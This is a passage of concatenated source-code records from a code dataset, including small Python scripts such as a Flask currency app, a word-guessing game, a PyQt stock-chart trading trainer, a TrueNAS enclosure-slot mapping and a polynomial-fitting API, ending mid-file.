json.dump(json_object, fp, indent=4, separators=(',', ': '))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"296376909","text":"from django.test import TestCase\n\n# Create your tests here.\nimport requests\ndata = {\n \"ToUserName\": \"uuu\",\n \"FromUserName\": \"xxx\",\n \"CreateTime\": \"1348831860\",\n \"MsgType\": \"text\",\n \"Content\": \"hhh\",\n \"MsgId\": \"1234567\",\n}\nurl = 'http://45.77.125.45/remind/get/'\nres = requests.post(url, data=data)\nprint(res.text)\n","sub_path":"remind/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"569502615","text":"from flask import Flask, flash, redirect, render_template, request, session, abort\nimport os\nimport json\nimport urllib2\n \ntmpl_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')\napp = Flask(__name__, template_folder=tmpl_dir)\n \ndef getExchangeRates():\n rates = []\n response = urllib2.urlopen('http://api.fixer.io/latest')\n data = response.read()\n rdata = json.loads(data, parse_float=float)\n \n rates.append( rdata['rates']['USD'] )\n rates.append( rdata['rates']['GBP'] )\n rates.append( rdata['rates']['HKD'] )\n rates.append( rdata['rates']['AUD'] )\n return rates\n \n@app.route(\"/\")\ndef index():\n rates = getExchangeRates()\n return render_template('test.html',**locals()) \n \n@app.route(\"/hello\")\ndef hello():\n return \"Hello World!\"\n \n \nif __name__ == \"__main__\":\n app.run()\n","sub_path":"Documents/5-FlaskCharts/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"618827119","text":"# (C) Copyright 2008 Association Paris-Montagne\n# Author: Georges Racinet \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as published\n# by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA\n# 02111-1307, USA.\n#\n# $Id: __init__.py 890 2008-06-18 18:26:32Z joe $\n\nfrom Products.CMFCore.permissions import setDefaultRoles\n\nViewCollectorData = 'View collector data'\nsetDefaultRoles(ViewCollectorData, ('Manager', 'Owner'))\n\nManageCollectorData = 'Manage collector data'\nsetDefaultRoles(ManageCollectorData, ('Manager', 'Owner'))\n","sub_path":"permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"465169089","text":"import matplotlib.pyplot as plt\r\n\r\nX = range(1, 50)\r\n\r\nY = [value * 2 for value in X]\r\n\r\nprint(\"Values of X:\")\r\n\r\nprint(*range(1,50)) \r\n\r\nprint(\"Values of Y (twice of X):\")\r\n\r\nprint(Y)\r\n\r\n# Plot lines and/or markers to the Axes.\r\n\r\nplt.plot(X, Y)\r\n\r\n# Set the x axis label of the current axis.\r\n\r\nplt.xlabel('x - axis')\r\n\r\n# Set the y axis label of the current axis.\r\n\r\nplt.ylabel('y - axis')\r\n\r\n# Set a title \r\n\r\nplt.title('Plot of (X,Y).')\r\n\r\n# Display the figure.\r\n\r\nplt.show()","sub_path":"demo 1.py","file_name":"demo 1.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"56160145","text":"#A small word guessing game\n#By Hamish O'Keeffe\n#Change Log:\n#Version 0.2 (31-03-2016):\n#Added end function\n#Added wrongGuess system\n#Made the user unable to guess the same letter\n#Added some more feedback to the user\n#Version 0.1 (30-03-2016):\n#Initial Version\nwordList = [\"Aversa\",\"Anna\",\"Priam\",\"Nowi\",\"LonQu\",\"SayRi\",\"Gaius\",\"Yuugiri\"]\ndef select_word():\n import random\n word = wordList[random.randint(1,len(wordList))-1]\n return word \n\ndef setup(word):\n wordHidden = list('?' * len(word))\n #print(word)#Debug\n #print(wordHidden)#Debug\n return wordHidden\n\ndef user_guess(word,wordHidden):\n score = 0\n guessed = []\n wrongGuessNo = 0\n wordSplit = list(word.lower())\n #print(wordSplit)#Debug\n print(''.join(wordHidden))\n import re\n while \"?\" in wordHidden:\n guess = input(\"Please enter a letter\").lower()\n while len(guess) != 1 or not re.match(\"[a-z]\", guess):\n print(\"Error. Please enter a single letter.\")\n guess = input(\"Please enter a letter\").lower()\n if guess in guessed:\n print(\"You have already guessed {0}.\".format(guess))\n elif guess in wordSplit:\n pos = 0\n guessPos = [i for i, x in enumerate(wordSplit) if x == guess.lower()]\n #print(guessPos)#Debug\n for each in guessPos:\n wordHidden.pop(guessPos[pos])\n wordHidden.insert(guessPos[pos],guess)\n pos = pos + 1\n print(''.join(wordHidden))\n guessed.append(guess)\n else:\n print(\"Sorry. {0} is not in the word.\".format(guess))\n wrongGuessNo = wrongGuessNo + 1\n guessed.append(guess)\n print(''.join(wordHidden))\n if wrongGuessNo > 5:\n break\n print(\"Letters guessed:\")\n print(','.join(guessed))\n return wordHidden\n\ndef end(word,wordHidden):\n if ''.join(wordHidden) == word.lower():\n print(\"Congrats! You won.\")\n else:\n print(\"Sorry, you lost.\")\n\ndef main():\n repeat = True\n while repeat == True:\n word = select_word()\n wordHidden = setup(word)\n wordHidden = user_guess(word,wordHidden)\n end(word,wordHidden)\n playAgain = input(\"Play again? (Y/N)\")\n if playAgain.lower() in [\"n\",\"no\"]:\n break\n print(\"Goodbye\")\n exit()\n \n \n\nmain()\n \n","sub_path":"wordGuessGameV0.2.py","file_name":"wordGuessGameV0.2.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"366940507","text":"# Python 3.6.0\n# -*- coding: utf-8 -*-\n# 14.py\n\nimport sys\n\nlast = int(sys.argv[2])\n\nwith open(sys.argv[1]) as f:\n lines = f.readlines()\n\nfor line in lines:\n if line == lines[last]:\n break\n print(line, end=\"\")\n\n# command line\n\n# \n# $ head -3 hightemp.txt\n","sub_path":"Chapter02/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"50743010","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/2/23\n# @Author : chenlin\n# @Site :\n# @File : conftest.py\n# @Software: PyCharm\n\"\"\"\nconftest.py 全局变量,主要实现以下功能:\n1、添加命令行参数broswer, 用于切换不用浏览器\n2、全局参数driver调用\n\"\"\"\n\n\nimport time\nimport pytest\nfrom public.common import pyselenium\nfrom public.common import datainfo\nfrom public.appmodel import loginaction\nfrom config import globalparam\nfrom public.common import log\n\n# domain_data = datainfo.get_xls_to_dict(\"user.xlsx\", \"Sheet1\")[\"创建域管理员\"]\n# user_data = datainfo.get_xls_to_dict(\"user.xlsx\", \"authuser\")['创建运营部门用户']\nlog = log.Log()\n\n@pytest.fixture(scope=\"session\")\ndef driver(request):\n global driver\n '''只打开浏览器和关闭浏览器'''\n log.info(\"打开浏览器\")\n driver = pyselenium.PySelenium(globalparam.browser)\n driver.max_window() # 最大化\n\n def end():\n log.info(\"用例全部执行完毕,关闭浏览器\")\n time.sleep(globalparam.small)\n driver.quit()\n\n request.addfinalizer(end)\n return driver\n\n\n@pytest.fixture()\ndef login_admin(request, driver):\n \"\"\"用户登录\"\"\"\n log.info(\"用户登录\")\n login = loginaction.Login(driver)\n login.login('15928009283', 'www123456.')\n\n def end():\n log.info(\"测试用例执行完成,登出系统\")\n driver.origin_driver.delete_all_cookies()\n\n request.addfinalizer(end)\n return driver\n\n\n\n","sub_path":"testcase/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"259717428","text":"if __name__ == '__main__':\n import glob\n import os\n import re\n import shutil\n from collections import defaultdict, namedtuple\n\n class Result:\n def __init__(self):\n self.win = self.draw = self.lose = 0\n\n def __repr__(self):\n return f'{self.win}/{self.draw}/{self.lose}'\n\n d = defaultdict(lambda : defaultdict(lambda : defaultdict(lambda : Result())))\n\n ntest_lv_set = set()\n arz_gen_set = set()\n arz_sim_set = set()\n\n for fn in glob.glob('data/**/*', recursive=True):\n p = re.compile('.*reversi-NTest_(\\d*)-ARZ_(\\d*)_(\\d*)-(\\d*)_(\\d*).*ggf$')\n m = p.match(fn)\n ntest_lv = None\n if m:\n ntest_lv = int(m.group(1))\n arz_gen = int(m.group(2))\n arz_sim = int(m.group(3))\n arz_min = None\n ntest_score = int(m.group(4))\n arz_score = int(m.group(5))\n\n p = re.compile('.*reversi-NTest_(\\d*)-ARZ_(\\d*)_(\\d*)min-(\\d*)_(\\d*).*ggf$')\n m = p.match(fn)\n if ntest_lv is None and m:\n ntest_lv = int(m.group(1))\n arz_gen = int(m.group(2))\n arz_sim = None\n arz_min = int(m.group(3))\n ntest_score = int(m.group(4))\n arz_score = int(m.group(5))\n\n p = re.compile('.*reversi-ARZ_(\\d*)_(\\d*)-NTest_(\\d*)-(\\d*)_(\\d*).*ggf$')\n m = p.match(fn)\n if ntest_lv is None and m:\n arz_gen = int(m.group(1))\n arz_sim = int(m.group(2))\n arz_min = None\n ntest_lv = int(m.group(3))\n arz_score = int(m.group(4))\n ntest_score = int(m.group(5))\n\n p = re.compile('.*reversi-ARZ_(\\d*)_(\\d*)min-NTest_(\\d*)-(\\d*)_(\\d*).*ggf$')\n m = p.match(fn)\n if ntest_lv is None and m:\n arz_gen = int(m.group(1))\n arz_sim = None\n arz_min = int(m.group(2))\n ntest_lv = int(m.group(3))\n arz_score = int(m.group(4))\n ntest_score = int(m.group(5))\n\n if ntest_lv is None:\n continue\n\n if arz_score < ntest_score:\n continue\n\n dest_folder = os.path.join(os.path.dirname(fn), '../../../../reversi-alpha-zero-models/challenge-2/ggf', f'step-{arz_gen}')\n if arz_sim:\n dest_folder = os.path.join(dest_folder, f'sim-{arz_sim}')\n else:\n dest_folder = os.path.join(dest_folder, f'min-{arz_min}')\n dest_folder = os.path.join(dest_folder, f'ntest-{ntest_lv}')\n os.makedirs(dest_folder, exist_ok=True)\n dest = os.path.join(dest_folder, os.path.basename(fn))\n shutil.copy(fn, dest)\n","sub_path":"data/reversi/ggf/copygames.py","file_name":"copygames.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"444144963","text":"from django.urls import path\nfrom .views import (\n PostListView,\n PostDetailView,\n UserPostListView,\n)\n\nurlpatterns = [\n path('', PostListView.as_view(), name='blog-home'),\n path('post//', PostDetailView.as_view(), name='post-detail'),\n path('user/', UserPostListView.as_view(), name='user-posts'),\n]\n","sub_path":"SPE-website/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"521030186","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\nimport random\nimport numpy as np\nimport DB\n\n\n# main window\n# which inherits QDialog\nclass Window(QWidget):\n\n # constructor\n def __init__(self, parent=None):\n super(Window, self).__init__(parent)\n\n self.played=0\n self.skipped=0\n self.d_df={}#first is df master, second is the until random day\n\n self.ts_code=\"\"\n self.name=\"\"\n self.won=0\n self.port=100\n self.reveal_fgain20=0\n\n\n self.figure = plt.figure()\n self.canvas = FigureCanvas(self.figure)\n\n\n self.toolbar = NavigationToolbar(self.canvas, self)\n\n #labels\n self.label= QLabel(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n self.label.setFont(QFont('Arial', 20))\n self.message= QLabel(f\"\")\n self.message.setFont(QFont('Arial', 30))\n\n # display buttons\n self.labelDisplay = QLabel(f\"Display:\")\n self.labelDisplay.setFont(QFont('Arial', 20))\n\n\n\n self.d240 = QPushButton('240 Days')\n self.d240.clicked.connect(self.draw240)\n self.d240.setFont(QFont('Arial', 20))\n\n self.d500 = QPushButton('500 Days')\n self.d500.clicked.connect(self.draw500)\n self.d500.setFont(QFont('Arial', 20))\n\n self.dall = QPushButton('All Time')\n self.dall.clicked.connect(self.drawalltime)\n self.dall.setFont(QFont('Arial', 20))\n\n #action buttons\n self.labelAction = QLabel(f\"Action:\")\n self.labelAction.setFont(QFont('Arial', 20))\n\n self.next = QPushButton('Next')\n self.next.clicked.connect(self.generate_chart)\n self.next.setFont(QFont('Arial', 20))\n\n self.resultbutton = QPushButton('Showresult')\n self.resultbutton.clicked.connect(self.showresult)\n self.resultbutton.setFont(QFont('Arial', 20))\n\n self.buy = QPushButton('Long 20 Days')\n self.buy.clicked.connect(self.long)\n self.buy.setFont(QFont('Arial', 20))\n\n self.sell = QPushButton('Short 20 Days')\n self.sell.clicked.connect(self.short)\n self.sell.setFont(QFont('Arial', 20))\n\n\n # creating a Vertical Box layout\n layout = QVBoxLayout()\n layout.addWidget(self.toolbar)\n layout.addWidget(self.canvas)\n\n hbox1 = QHBoxLayout()\n hbox1.addWidget(self.labelDisplay)\n hbox1.addWidget(self.d240)\n hbox1.addWidget(self.d500)\n hbox1.addWidget(self.dall)\n\n hbox2 = QHBoxLayout()\n hbox2.addWidget(self.labelAction)\n hbox2.addWidget(self.next)\n hbox2.addWidget(self.resultbutton)\n hbox2.addWidget(self.buy)\n hbox2.addWidget(self.sell)\n\n\n layout.addWidget(self.label)\n layout.addWidget(self.message)\n layout.addLayout(hbox1)\n layout.addLayout(hbox2)\n self.setLayout(layout)\n\n self.buy.setEnabled(False)\n self.sell.setEnabled(False)\n\n\n def draw500(self):\n # display last 20 days\n df = self.d_df[\"df\"]\n df = df.tail(500)\n self.draw_normal(df=df)\n\n def draw240(self):\n #display last 20 days\n df=self.d_df[\"df\"]\n df=df.tail(240)\n self.draw_normal(df=df)\n\n def drawalltime(self):\n #display last 20 days\n df=self.d_df[\"df\"]\n self.draw_normal(df=df)\n\n def draw_result(self):\n print(\"draw_result\")\n # clearing old figure\n self.figure.clear()\n\n # get the result with 60 days in the future\n df=self.d_df[\"df_master\"]\n number=self.d_df[\"number\"]\n df_old=self.d_df[\"df\"]\n\n df=df.head(number+20)\n trade_date=df.index[number]\n trade_datem=df.index[number-1]\n trade_datep=df.index[number+1]\n\n\n self.d_df[\"number\"]=newnum=self.d_df[\"number\"]+20\n self.d_df[\"df\"]=self.d_df[\"df_master\"].head(newnum)\n\n\n for col in [\"trade\",\"tradevol\"]:\n helper=\"close\" if col==\"trade\" else \"turnover_rate\"\n df.at[trade_date,col]=self.d_df[\"df_master\"].at[trade_date,col]=df_old[helper].max()\n df.at[trade_datem,col]=self.d_df[\"df_master\"].at[trade_date,col]=df_old[helper].min()\n df.at[trade_datep,col]=self.d_df[\"df_master\"].at[trade_datep,col]=df_old[helper].min()\n\n df = df.reset_index()\n self.draw_normal(df=df,a_col1=[\"close\",\"trade\"],a_col2=[\"turnover_rate\",\"tradevol\"])\n\n\n def draw_normal(self,df,a_col1=[\"close\",\"trade\"],a_col2=[\"turnover_rate\",\"tradevol\"]):\n df = df.reset_index()\n # clearing old figure\n self.figure.clear()\n\n # create an axis\n ax = self.figure.add_subplot(211)\n # plot data\n for col in a_col1:\n ax.plot(df[col])\n ax2 = self.figure.add_subplot(212)\n # plot data\n for col in a_col2:\n ax2.plot(df[col])\n\n # refresh canvas\n self.canvas.draw()\n\n\n def prepare_continue_trade_check(self):\n df_master=self.d_df[\"df_master\"]\n number=self.d_df[\"number\"]\n if False:\n # continue, can be further traded\n self.buy.setEnabled(True)\n self.sell.setEnabled(True)\n else:\n self.buy.setEnabled(False)\n self.sell.setEnabled(False)\n\n\n\n def long(self):\n self.played += 1\n if self.reveal_fgain20> 1:\n self.won+=1\n self.port = self.port * self.reveal_fgain20\n self.message.setText(f\"{self.name}: Your Long is correct! Fgain is {self.reveal_fgain20} in next 60 days\")\n else:\n self.port = self.port * self.reveal_fgain20\n self.message.setText(f\"{self.name}: Your Long is wrong! Fgain is {self.reveal_fgain20} in next 60 days\")\n\n df_master = self.d_df[\"df_master\"]\n number = self.d_df[\"number\"]\n df_result = df_master.iloc[number:number + 20]\n pgain = df_result[\"close\"].iat[-1] / df_result[\"close\"].iat[0]\n\n self.reveal_fgain20 = np.round(pgain, 2)\n self.label.setText(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n\n\n self.draw_result()\n self.prepare_continue_trade_check()\n\n\n\n\n def short(self):\n self.played += 1\n if self.reveal_fgain20 < 1:#correct bet\n self.won += 1\n self.port = self.port * (1 + (1 - self.reveal_fgain20))\n self.message.setText(f\"{self.name}: Your Short is correct! Fgain is {self.reveal_fgain20} in next 60 days\")\n else:#false bet. stock gained\n self.port = self.port * (1 - (self.reveal_fgain20 - 1))\n self.message.setText(f\"{self.name}: Your Short is wrong! Fgain is {self.reveal_fgain20} in next 60 days\")\n\n df_master=self.d_df[\"df_master\"]\n number=self.d_df[\"number\"]\n df_result = df_master.iloc[number:number + 20]\n pgain = df_result[\"close\"].iat[-1] / df_result[\"close\"].iat[0]\n self.reveal_fgain20 = np.round(pgain, 2)\n self.label.setText(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n\n\n self.draw_result()\n self.prepare_continue_trade_check()\n\n\n def showresult(self):\n self.message.setText(f\"{self.name}: Fgain would be {self.reveal_fgain20} \")\n df_master=self.d_df[\"df_master\"]\n number=self.d_df[\"number\"]\n df_result = df_master.iloc[number:number + 20]\n pgain = df_result[\"close\"].iat[-1] / df_result[\"close\"].iat[0]\n self.reveal_fgain20 = np.round(pgain, 2)\n self.label.setText(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n self.draw_result()\n self.prepare_continue_trade_check()\n\n\n def generate_chart(self):\n if self.buy.isEnabled() and self.sell.isEnabled():\n self.skipped += 1\n self.label.setText(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n self.message.setText(f\"\")\n\n df_ts_code = DB.get_ts_code(a_asset=[\"E\"])\n for _ in range(0, 1000):\n try:\n df_random = df_ts_code.sample(1)\n ts_code = df_random.index[0]\n name=df_ts_code.at[ts_code,\"name\"]\n df_master = DB.get_asset(ts_code=ts_code)\n if len(df_master)<500:\n continue\n\n self.ts_code=ts_code\n self.name=name\n df_master[\"trade\"]=np.nan\n df_master[\"tradevol\"]=np.nan\n\n\n number = random.randint(250, len(df_master)-20)\n df=df_master.head(number)\n\n #the real result\n df_result=df_master.iloc[number:number+20]\n pgain=df_result[\"close\"].iat[-1]/df_result[\"close\"].iat[0]\n\n self.reveal_fgain20 =np.round(pgain, 2)\n\n self.d_df={\"df_master\":df_master,#original\n \"number\": number,#cuted\n \"df\": df} # displayed\n break\n except:\n pass\n\n self.draw_normal(df=df)\n self.buy.setEnabled(True)\n self.sell.setEnabled(True)\n\n\n\n# driver code\nif __name__ == '__main__':\n # creating apyqt5 application\n\n app = QApplication(sys.argv)\n main = Window()\n main.show()\n sys.exit(app.exec_())","sub_path":"TechTest.py","file_name":"TechTest.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"280449068","text":"from collections import namedtuple\nimport re\n\nfrom middlewared.service import Service, private\n\nProductMapping = namedtuple(\"ProductMapping\", [\"product_re\", \"mappings\"])\nVersionMapping = namedtuple(\"VersionMapping\", [\"version_re\", \"slots\"])\nMappingSlot = namedtuple(\"MappingSlot\", [\"num\", \"slot\", \"identify\"])\n\n\nMAPPINGS = [\n ProductMapping(re.compile(r\"FREENAS-MINI-3.0-E\\+?$\"), [\n VersionMapping(re.compile(\".*\"), [\n MappingSlot(0, 0, False),\n MappingSlot(0, 1, False),\n MappingSlot(0, 2, False),\n MappingSlot(0, 3, False),\n MappingSlot(0, 5, False),\n MappingSlot(0, 4, False),\n ]),\n ]),\n ProductMapping(re.compile(r\"FREENAS-MINI-3.0-X$\"), [\n VersionMapping(re.compile(\".*\"), [\n MappingSlot(0, 0, False),\n MappingSlot(0, 1, False),\n MappingSlot(0, 2, False),\n MappingSlot(0, 3, False),\n MappingSlot(1, 0, False),\n MappingSlot(1, 1, False),\n MappingSlot(1, 3, False),\n ]),\n ]),\n ProductMapping(re.compile(r\"FREENAS-MINI-3.0-X\\+$\"), [\n VersionMapping(re.compile(\".*\"), [\n MappingSlot(0, 0, False),\n MappingSlot(0, 1, False),\n MappingSlot(0, 2, False),\n MappingSlot(0, 3, False),\n MappingSlot(0, 4, False),\n MappingSlot(0, 5, False),\n MappingSlot(0, 6, False),\n ]),\n ]),\n ProductMapping(re.compile(r\"FREENAS-MINI-3.0-XL\\+$\"), [\n VersionMapping(re.compile(\".*\"), [\n MappingSlot(1, 4, False),\n MappingSlot(0, 0, False),\n MappingSlot(0, 1, False),\n MappingSlot(0, 2, False),\n MappingSlot(0, 3, False),\n MappingSlot(0, 4, False),\n MappingSlot(0, 5, False),\n MappingSlot(0, 6, False),\n MappingSlot(0, 7, False),\n MappingSlot(1, 3, False),\n ]),\n ]),\n]\n\n\nclass EnclosureService(Service):\n @private\n async def map_enclosures(self, enclosures):\n info = await self.middleware.call(\"system.info\")\n for product_mapping in MAPPINGS:\n if product_mapping.product_re.match(info[\"system_product\"]):\n for version_mapping in product_mapping.mappings:\n if version_mapping.version_re.match(info[\"system_product_version\"]):\n return await self._map_enclosures(enclosures, version_mapping.slots)\n\n return enclosures\n\n async def _map_enclosures(self, enclosures, slots):\n elements = []\n has_slot_status = False\n for slot, mapping in enumerate(slots, 1):\n try:\n original_enclosure = enclosures[mapping.num]\n except IndexError:\n self.logger.error(\"Mapping referenced enclosure %d but it is not present on this system\",\n mapping.num)\n return []\n\n original_slots = list(filter(lambda element: element[\"name\"] == \"Array Device Slot\",\n original_enclosure[\"elements\"]))[0][\"elements\"]\n\n try:\n original_slot = original_slots[mapping.slot]\n except IndexError:\n self.logger.error(\"Mapping referenced slot %d in enclosure %d but it is not present on this system\",\n mapping.slot, mapping.num)\n return []\n\n element = {\n \"slot\": slot,\n \"data\": dict(original_slot[\"data\"], **{\n \"Descriptor\": f\"Disk #{slot}\",\n }),\n \"name\": \"Array Device Slot\",\n \"descriptor\": f\"Disk #{slot}\",\n \"status\": original_slot[\"status\"],\n \"value\": original_slot[\"value\"],\n \"value_raw\": original_slot[\"value_raw\"],\n \"original\": {\n \"enclosure_id\": original_enclosure[\"id\"],\n \"slot\": original_slot[\"slot\"],\n },\n }\n if mapping.identify:\n has_slot_status = True\n for k in [\"fault\", \"identify\"]:\n if k in original_slot:\n element[k] = original_slot[k]\n else:\n self.logger.warning(\"Mapping referenced slot %d in enclosure %d as identifiable but key %r \"\n \"is not present on this system\", mapping.slot, mapping.num, k)\n has_slot_status = False\n\n elements.append(element)\n\n info = await self.middleware.call(\"system.info\")\n return [\n {\n \"id\": \"mapped_enclosure_0\",\n \"name\": \"Drive Bays\",\n \"model\": info[\"system_product\"],\n \"controller\": True,\n \"label\": \"Drive Bays\",\n \"elements\": [\n {\n \"name\": \"Array Device Slot\",\n \"descriptor\": \"Drive Slots\",\n \"header\": [\"Descriptor\", \"Status\", \"Value\", \"Device\"],\n \"elements\": elements,\n \"has_slot_status\": has_slot_status,\n },\n ],\n }\n ]\n","sub_path":"src/freenas/usr/local/lib/middlewared_truenas/plugins/enclosure_/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287974024","text":"from flask import Flask\nfrom flask_restful import Resource, Api\nimport numpy as np \nimport random\nimport re\n\napp = Flask(__name__)\napi = Api(app)\n\nclass findPolynomial(Resource):\n def get(self, p, degree):\n ''' find a polynomial of degree n determined by n+1 of its points \n form: y = a0 + a1x + a2x^2 + ... + anx^n\n '''\n nums = re.findall(re.compile(r'[\\d]*'),p)\n points1 = []\n for x in nums:\n if x != '':\n points1.append(x)\n points = []\n for y in range(len(points1)):\n if (y % 2) == 0:\n points.append((int(points1[y]),int(points1[y+1])))\n else:\n continue\n if len(points) < (degree + 1):\n return \"Not Enough Points to Determine Polynomial\"\n else:\n A = np.empty([degree+1,degree+1])\n b = np.empty([degree+1,1])\n for y in range(degree+1):\n for p in range(degree+1):\n A[y][p] = points[y][0]**p\n b[y] = points[y][1]\n try:\n solution = np.linalg.solve(A,b)\n text = str(int(round(solution[0][0]))) + ' + '\n for n in range(1, len(solution)):\n text += str(int(round(solution[n][0]))) + 'x^' + str(n)\n if n < len(solution) - 1:\n text += ' + '\n return text\n except:\n return \"Invalid Points\"\n\nclass makePoints(Resource):\n def get(self, c, number):\n ''' Given coefficients a0, a1, a2, ..., returns points for a polynomial of the form:\n y = a0 + a1x + a2x^2 + ... + anx^n\n up to 100 points\n up to 5th degree polynomial\n '''\n coefficients = []\n nums = re.findall(re.compile(r'[\\d]*'),c)\n print(nums)\n for x in nums:\n if x !='':\n coefficients.append(int(x))\n if (len(coefficients) > 6):\n return \"More than 5th degree polynomial\"\n elif (number > 100):\n return \"More than 100 points\"\n else:\n X = random.sample(range(100), number)\n points = []\n for x in X:\n sum = 0\n for a in range(len(coefficients)):\n sum += coefficients[a]*(x**a)\n points.append((x,sum))\n return str(points)\n\n\napi.add_resource(findPolynomial, '/findPolynomial//')\napi.add_resource(makePoints, '/makePoints//')\n\n\nif __name__ == '__main__':\n # app.run(debug=True)\n app.run()\n\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123866851","text":"\"\"\"Use this to complete part 2\n\n Usage:\n $ python mlp_relu.py\n\n Trains a three layer neural network using the relu function as the\n activation function. Trains on four different learning rates\n (0.1, 0.01, 0.001, 0.0001) and plots the results. Finally,\n performs a classifier test on the testing data set from CIFAR10\n and prints the results.\n\n\"\"\"\n\nimport mlp\n#import matplotlib.pyplot as plt\n\nEPOCHS = 100\n\nif __name__ == '__main__':\n train_loader = mlp.get_cifar10_data(train=True)\n validation_loader = mlp.get_cifar10_data(train=False)\n test_loader = mlp.get_cifar10_test_data()\n\n # training and validation\n train_loss1, accv1, model1 = mlp.relu_NN_train_and_val(train_loader, validation_loader, \n lr=0.1, epochs=EPOCHS)\n train_loss2, accv2, model2 = mlp.relu_NN_train_and_val(train_loader, validation_loader, \n lr=0.01, epochs=EPOCHS)\n train_loss3, accv3, model3 = mlp.relu_NN_train_and_val(train_loader, validation_loader, \n lr=0.001, epochs=EPOCHS)\n train_loss4, accv4, model4 = mlp.relu_NN_train_and_val(train_loader, validation_loader, \n lr=0.0001, epochs=EPOCHS)\n\n epochs = range(1, EPOCHS + 1)\n\n # Training loss plot\n #plt.figure(1)\n #plt.plot(epochs, train_loss1, '-b', label='lr=0.1')\n #plt.plot(epochs, train_loss2, '-r', label='lr=0.01')\n #plt.plot(epochs, train_loss3, '-g', label='lr=0.001')\n #plt.plot(epochs, train_loss4, '-p', label='lr=0.0001')\n #plt.legend(loc='lower right')\n #plt.xlabel('Number of epochs')\n #plt.ylabel('Average loss')\n #plt.title('Negative Log Loss on Training Data as a Function of Epochs')\n #plt.savefig(\"relu_training_loss.png\")\n #print 'Plot saved as \"relu_training_loss.png\"'\n\n # Validation accuracy plot\n #plt.figure(2)\n #plt.plot(epochs, accv1, '-b', label='lr=0.1')\n #plt.plot(epochs, accv2, '-r', label='lr=0.01')\n #plt.plot(epochs, accv3, '-g', label='lr=0.001')\n #plt.plot(epochs, accv4, '-p', label='lr=0.0001')\n #plt.legend(loc='lower right')\n #plt.xlabel('Number of epochs')\n #plt.ylabel('Accuracy')\n #plt.title('Classifier Accuracy on Validation Data as a Function of Epochs')\n #plt.savefig(\"relu_accuracy.png\")\n #print 'Plot saved as \"relu_accuracy.png\"'\n\n # Determine which model is best and then perform validation on test data\n modelv = [model1, model2, model3, model4]\n model_accuracy = [accv1[EPOCHS-1], accv2[EPOCHS-1], accv3[EPOCHS-1], accv4[EPOCHS-1]]\n \n model_index = model_accuracy.index(max(model_accuracy))\n best_model = modelv[model_index]\n print(\"\\nBest model -- Learning rate of %f\" % (10**(-1*(model_index + 1))))\n\n print(\"Results of validation on testing set:\")\n lossv, accv = [], []\n mlp.validate(lossv, accv, best_model, test_loader)\n \n","sub_path":"src/assignment_3/mlp_relu.py","file_name":"mlp_relu.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390158663","text":"# (C) Datadog, Inc. 2019\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport os\n\nimport mock\nimport pytest\n\nfrom datadog_checks.dev.kube_port_forward import port_forward\nfrom datadog_checks.dev.terraform import terraform_run\nfrom datadog_checks.utils.common import get_docker_hostname\n\nfrom .common import ADDL_AGENT_METRICS, AGENT_DEFAULT_METRICS, 